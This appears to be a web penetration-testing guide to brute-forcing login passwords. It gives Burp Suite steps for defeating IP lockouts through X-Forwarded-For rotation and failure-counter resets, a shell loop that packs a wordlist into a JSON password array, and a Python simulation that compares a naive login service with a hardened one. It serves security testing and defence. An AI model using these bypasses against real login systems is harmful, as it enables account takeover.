- Testing for Weak Password Policy (WSTG-ATHN-07)
- NIST proposes barring some of the most nonsensical password rules (Ars Technica)
- Vulnerability description for reporting available in VulnDB (GitHub)
Bruteforcing Passwords
Bruteforce the passwords of the usernames collected during the enumeration phase. Check first whether the application locks accounts or blocks IPs after repeated failures, since that determines which of the bypasses below you need.
Bypassing IP Blocking
With HTTP Header
- Send the login request to the Intruder module in Burp Suite.
- Add the HTTP header X-Forwarded-For to the request and mark its value as a payload position, in addition to the password field.
- Select Pitchfork as the attack type, so that every password attempt is paired with a different header value.
- For the header position, use the payload type Numbers, set the range From 1 To 100, Step to 1, Max fraction digits to 0.
X-Forwarded-For: §dummy§
This only works when the application derives the client address from X-Forwarded-For (typically because it sits behind a reverse proxy) and the proxy does not overwrite the header. If the application validates the value as an IP address, prefix the number so it forms one, for example X-Forwarded-For: 10.0.0.§dummy§.
With valid login
The IP can be blocked after too many failed login attempts. In some implementations, the counter of failed attempts for an IP is reset whenever a login from that IP succeeds. Use a macro and a session handling rule to issue a successful login (with a valid account of your own) before each bruteforce attempt.
- Click on the Settings menu.
- Under Macros, click Add.
- Select the successful login request.
- Give the macro a name (Login).
- Click OK.
- Under Session handling rules, click Add.
- In the Details tab:
  - Under Rule Description, enter a description like Intruder.
  - Under Rule Actions, click Add and select Run a macro. Select the macro Login and click OK.
- In the Scope tab:
  - Under Tools Scope, select Intruder and unselect the rest.
  - Under URL Scope, select Include all URLs.
- Click OK.
- Close the Settings window.
Every Intruder request now triggers the macro first, which roughly doubles the number of requests sent; verify in the Logger that the successful login actually precedes each attempt and that the counter is really reset before running a large wordlist.
By supplying multiple passwords in one request
Some login handlers accept the password field as a JSON array and return success if any element matches. A single request then tests many candidates while counting as only one attempt against the lockout counter.
{"username":"victim","password":["whatever1","whatever2","whatever3"]}
Generate the array elements from a password list. Reading line by line keeps passwords that contain spaces intact; the trailing comma is stripped before you wrap the output in brackets. Passwords containing " or \ still need JSON escaping:
while IFS= read -r pass; do printf '"%s",' "$pass"; done < wl.txt | sed 's/,$//'
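The following Python script is an added example, not code from the original notes or from Burp Suite. It models a login endpoint that has the three weaknesses described above (client IP taken from X-Forwarded-For, failure counter reset on success, password accepted as a JSON array) next to a hardened version, and shows how the header rotation and the multi-password body combine to recover a password while a plain one-request-per-password attack gets blocked. The service classes, the MAX_FAILURES threshold, the USERS table and the WORDLIST are constructed for the example and stand in for the real target and wordlist.

```python
import json
from collections import defaultdict

MAX_FAILURES = 5  # lockout threshold, an assumption for this example

# Constructed sample data, not taken from any real target.
USERS = {"victim": "Winter2024!"}
WORDLIST = ["password", "123456", "qwerty", "letmein", "welcome",
            "admin", "Summer2024!", "Winter2024!", "changeme", "P@ssw0rd"]


class NaiveLoginService:
    """Server side with the weaknesses the notes describe: the client IP is
    taken from X-Forwarded-For, a successful login resets the failure
    counter, and "password" may be a JSON array."""

    def __init__(self, users):
        self.users = users
        self.failures = defaultdict(int)
        self.requests = 0

    def _client_ip(self, headers, remote_addr):
        # Trusting a client-controlled header for rate limiting is the bug.
        return headers.get("X-Forwarded-For", remote_addr).split(",")[0].strip()

    def login(self, body, headers=None, remote_addr="198.51.100.7"):
        self.requests += 1
        ip = self._client_ip(headers or {}, remote_addr)
        if self.failures[ip] >= MAX_FAILURES:
            return "blocked"
        data = json.loads(body)
        candidates = data["password"]
        if isinstance(candidates, str):
            candidates = [candidates]
        if any(p == self.users.get(data["username"]) for p in candidates):
            self.failures[ip] = 0  # reset on success: enables the macro trick
            return "ok"
        self.failures[ip] += 1
        return "failed"


class HardenedLoginService(NaiveLoginService):
    """Same service with the fixes: ignore X-Forwarded-For, reject
    non-string passwords, count failures per (address, account) and never
    reset the counter on success."""

    def login(self, body, headers=None, remote_addr="198.51.100.7"):
        self.requests += 1
        data = json.loads(body)
        key = (remote_addr, data["username"])
        if self.failures[key] >= MAX_FAILURES:
            return "blocked"
        password = data["password"]
        if not isinstance(password, str) or password != self.users.get(data["username"]):
            self.failures[key] += 1
            return "failed"
        return "ok"


def multi_password_body(username, passwords):
    """Build the multi-password JSON body; json.dumps takes care of quoting,
    escaping and the trailing comma the shell loop leaves behind."""
    return json.dumps({"username": username, "password": list(passwords)})


def xff_header(n, prefix="10.0.0."):
    """A fresh X-Forwarded-For value per request; the prefix keeps it a
    syntactically valid address in case the server parses it."""
    return {"X-Forwarded-For": f"{prefix}{n}"}


def brute_force(service, username, wordlist, chunk=4):
    """Rotate X-Forwarded-For on every request and send passwords in
    batches. Returns the recovered password or None."""
    n = 0
    for start in range(0, len(wordlist), chunk):
        n += 1
        batch = wordlist[start:start + chunk]
        if service.login(multi_password_body(username, batch), xff_header(n)) != "ok":
            continue
        # One password in the batch worked; narrow it down one per request.
        for pw in batch:
            n += 1
            if service.login(multi_password_body(username, [pw]), xff_header(n)) == "ok":
                return pw
    return None


def naive_brute_force(service, username, wordlist):
    """One password per request, same source address: hits the lockout."""
    for pw in wordlist:
        result = service.login(json.dumps({"username": username, "password": pw}))
        if result == "ok":
            return pw
        if result == "blocked":
            return None
    return None


if __name__ == "__main__":
    print("naive:", naive_brute_force(NaiveLoginService(USERS), "victim", WORDLIST))
    print("bypass:", brute_force(NaiveLoginService(USERS), "victim", WORDLIST))
    print("hardened:", brute_force(HardenedLoginService(USERS), "victim", WORDLIST))
```

Against the naive service the plain attack is blocked after MAX_FAILURES requests, while the batched attack with header rotation recovers the password in six requests; against the hardened service the array body is rejected outright and the per-account counter still applies. When reporting, the relevant finding is the server-side trust in X-Forwarded-For and the list-typed password field, not the Burp configuration used to exploit them.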